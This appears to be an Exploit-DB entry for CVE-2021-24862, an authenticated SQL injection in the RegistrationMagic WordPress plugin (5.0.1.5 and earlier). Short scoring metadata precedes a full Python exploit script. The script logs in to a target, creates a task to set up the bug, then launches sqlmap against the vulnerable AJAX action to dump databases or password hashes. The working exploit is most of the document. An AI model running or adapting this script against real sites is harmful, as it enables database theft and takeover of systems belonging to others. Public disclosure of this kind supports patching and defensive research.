Lucene search

Ron JostEDB-ID:50686

HistoryJan 27, 2022 - 12:00 a.m.

WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)

2022-01-2700:00:00

Ron Jost

www.exploit-db.com

215

wordpress

registrationmagic

sql injection

authenticated

exploit

ubuntu 20.04

cve-2021-24862

cwe-89

sql statement

duplicate tasks

ajax action

user input

security issue

vendor homepage

documentation

exploit author

version 5.0.1.5

vulnerability

plugin

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score

7.2

Confidence

High

EPSS

0.765

Percentile

98.3%

JSON

# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)
# Date 23.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://registrationmagic.com/
# Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip
# Version: <= 5.0.1.5
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24862
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md

'''
Description:
The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action
before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.
'''

# Banner:
import os

banner = '''
                                                                 
 _____ _____ _____     ___ ___ ___ ___       ___ ___ ___ ___ ___ 
|     |  |  |   __|___|_  |   |_  |_  |  ___|_  | | | . |  _|_  |
|   --|  |  |   __|___|  _| | |  _|_| |_|___|  _|_  | . | . |  _|
|_____|\___/|_____|   |___|___|___|_____|   |___| |_|___|___|___|
                                
                           [+] RegistrationMagic SQL Injection
                           [@] Developed by Ron Jost (Hacker5preme)                                                          
'''
print(banner)
import string
import argparse
import requests
from datetime import datetime
import random
import json
import subprocess

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD


print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# Create task to ensure duplicate:
dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2'

# Header:
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://" + target_ip,
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1"
}

# Body
body = {
    "rmc-task-edit-form-subbed": "yes",
    "rm-task-slide": "on",
    "rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)),
    "rmc_task_description": "fiasfdhb",
    "rmc_rule_sub_time_older_than_age": '',
    "rmc_rule_sub_time_younger_than_age": '',
    "rmc_rule_fv_fids[]": '',
    "rmc_rule_fv_fvals[]": '',
    "rmc_rule_pay_status[]": "pending",
    "rmc_rule_pay_status[]": "canceled",
    "rmc_action_user_acc": "do_nothing",
    "rmc_action_send_mail_sub": '',
    "rmc_action_send_mail_body": ''
}

# Create project
a = session.post(dupl_url, headers=header, data=body)


# SQL-Injection (Exploit):
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'

# Generate payload for sqlmap
print ('[+] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"'
exploitcode_cookie = ' --cookie="' + cookie + '"'
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))